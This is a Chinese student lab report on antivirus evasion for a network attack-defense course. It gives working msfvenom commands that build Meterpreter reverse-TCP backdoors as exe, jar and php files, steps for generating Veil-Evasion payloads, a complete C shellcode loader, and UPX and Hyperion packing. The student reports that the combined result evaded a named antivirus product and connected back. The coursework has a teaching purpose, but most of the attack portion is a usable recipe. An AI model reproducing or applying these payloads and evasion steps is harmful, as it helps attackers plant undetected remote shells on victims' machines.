2019-2020-2 网络对抗技术 20175318 Exp3 免杀原理与实践

一、免杀原理及基础问题回答

1.免杀原理
2.基础问题回答
3.免杀效果评价

二、实验内容

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧
任务二：通过组合应用各种技术实现恶意代码免杀
任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

三、开启杀软能绝对防止电脑中恶意代码吗？
四、实验总结与体会

一、免杀原理及基础问题回答
1.免杀原理

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。

2.基础问题回答

杀软是如何检测出恶意代码的？

基于特征码的检测：简单来说一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。
启发式恶意软件检测：就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确）
基于行为的恶意软件检测：可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确）

免杀是做什么？

是对恶意软件做处理，让它不被杀毒软件所检测
在渗透测试中也有应用

免杀的基本方法有哪些？

改变特征码
- 只有EXE——加壳（压缩壳加密壳）
- 有shellcode(像Meterpreter）——利用encode进行编码
- 有源代码——用其他语言进行重写再编译
  - veil-evasion
  - 半手工
改变行为
- 通讯方式
  - 尽量使用反弹式连接
  - 使用隧道技术
  - 加密通讯数据
- 操作模式
  - 基于内存操作
  - 减少对系统的修改
  - 加入混淆作用的正常功能代码
- 非常规方法
  - 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
  - 使用社工类攻击，诱骗目标关闭AV软件。
  - 纯手工打造一个恶意软件

3.免杀效果评价
利用VirusTotal或Virscan，它们集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

二、实验内容
任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

使用msf编码器生成各种后门程序及检测

1. 正确使用msf编码器，生成exe文件

在实验二中使用msf生成了后门程序，我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。

用VirusTotal扫描后结果如下：

Virscan网站的扫描结果如下：

由此可见不加处理的后门程序很容易被大部分杀软检测出来，因此我们尝试对其进行一次到多次编码，并进行检测。

一次编码

使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'x00'不出现在shellcode中，因为shellcode以'x00'为结束符

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.230.128 LPORT=5318 -f exe > met-encoded.exe

VirusTotal网站的扫描结果如下：

十次编码
使用命令：-i设置迭代次数

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 'x00' LHOST=192.168.230.128 LPORT=5318 -f exe > met-encoded10.exe

VirusTotal网站的扫描结果如下：

可见多次编码对免杀没有太大的效果，原因有两点：

杀软研究的是编码器本身，shikata_ga_nai的解码部分总会需要加入到exe中，这部分总会被杀软识别出来，所以效果可能更差
msfvenom会以固定的模板生成exe，因此会有一定的固定特征。所以杀软会针对其使用的模板来生成特征码，这样就解决所有msfvenom生成的恶意代码了。如果使用msfvenom免杀，就要使用新的模板生成exe

2. msfvenom生成jar文件

生成java后门程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=5318 x> lhr_backdoor_java.jar

扫描结果如下：

3. msfvenom生成php文件

使用命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=5318 x> lhr_backdoor.php

扫描结果如下：

使用veil-evasion生成后门程序及检测

用apt-get install veil-evasion命令安装veil
之后输入命令veil打开veil，输入y继续安装直至完成，这期间可能要等待较长时间：
成功的话，输入veil指令，会出现下面这个界面
用use evasion命令进入Evil-Evasion
输入命令use c/meterpreter/rev_tcp.py进入配置界面
设置反弹连接IP，命令为：set LHOST 192.168.230.128，注意此处的IP是Kali的IP；
设置端口，命令为：set LPORT 5318
输入generate生成文件，接着输入你想要playload的名字：veil-c-5318
如上图所示，保存路径为/var/lib/veil/output/compiled/veil-c-5318.exe
VirusTotal网站的扫描结果如下：

半手工注入Shellcode并执行

首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=5318 -f c用c语言生成一段shellcode;
创建一个文件20175318-backdoor.c，然后将unsigned char buf[]赋值到其中，代码如下：

unsigned char buf[] = 
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8xe6x80"
"x68x02x00x14xc6x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

使用命令：i686-w64-mingw32-g++ 20175318-backdoor.c -o 20175318-backdoor.exe编译为可执行文件;

VirusTotal网站的扫描结果如下：

那就加一下壳吧

首先介绍一下壳的作用和种类：

加壳的全称是可执行程序资源压缩，压缩后的程序可以直接运行
加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）
壳的种类可以分为：

压缩壳
减少应用体积，如ASPack,UPX
加密壳
版权保护，反跟踪。如ASProtect,Armadillo
虚拟机
通过类似编译手段，将应用指令转换为自己设计的指令集。如VMProtect,Themida

压缩壳UPX

对刚才生成的20175318-backdoor.exe用UPX加壳，输入：upx 20175318-backdoor.exe -o upx_20175318.exe，生成upx_20175318.exe
使用查壳软件，可以看到软件已经被成功加壳
这时候我们试一下反弹连接
连接成功，再用VirusTotal查一下：
还是被很多引擎查到了。。。。。

加密壳Hyperion

输入命令wine hyperion.exe -v upx_20175318.exe lhr_upx_Hyperion.exe进行加壳
反弹连接成功
再用VirusTotal查一下：

加壳以前接触过，当时还会手脱一些常见的壳。两年没搞这些，而且在kali上也不太熟悉，所以在这里就简单的用这两种壳。
使用其他课程未介绍的方法
这里选用一个Veil-Evasion的其他荷载生成后门方式
启动veil，进入evasion，输入list查看可用的有效荷载，如下
选择第30个荷载，是Python下shellcode在ARC下加密一种。
输入option,查看有效荷载的选项,如下:

我们对其进行基本的配置：
设置反弹IP以及端口号
设置生成文件的名字为lhr-arc以及格式为exe

可以看见exe文件已经生成,是setup.py和runme.bat,在/var/lib/veil/output/source/中
同时新生成的shellcode的rc文件也被保存在了veil-output下的handlers,打开查看后,是在msfconsole中需要输的指令,如图:

测试可用性

对这两个文件进行检测

任务二：通过组合应用各种技术实现恶意代码免杀
通过C+shellcode+免杀变形+压缩壳+加密壳的方式进行组合，成功实现免杀。

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本
这里使用Windows 7
杀毒软件：火绒安全软件
杀软版本：5.0.40.10
病毒库：2020-3-26 16:35

三、开启杀软能绝对防止电脑中恶意代码吗？
绝对这个词肯定是不能说的，在刚才的实验中，我们在kali中生成的后门文件，进行加壳后，杀毒软件并没有察觉，但是把生成的exe上传到VirusTotal，却有一大半的杀毒引擎报告这个程序有问题。所以开启杀软并不能绝对的防止电脑中恶意代码。
四、实验总结与体会
这次实验比前两次实验要复杂一点，因为这涉及了许多新知识，我们首先要学会使用两个在线查毒网站，其次要使用msf生成各式各样的后门程序，并进行查毒、反弹连接。在kali下加壳是一个新的知识点，以前都是在Windows下进行加壳与脱壳；这次实验让我对kali有了新的认识。最复杂的地方应该就是安装veil了，由于国内墙的原因，我们在下载veil的独立库时出现错误。所以我们要修改配置文件把github的链接换成gitee，这样我们就可以很快的下载安装了。在实验过程中，生成的一些后门程序有的并没有被本机的杀软检测出来，这让我认识到，杀软没有检测出来，并不代表完全安全，在以后上网的过程中还需谨慎小心，提高安全意识，要在官方正规网站下载程序，降低被植入后门的可能性。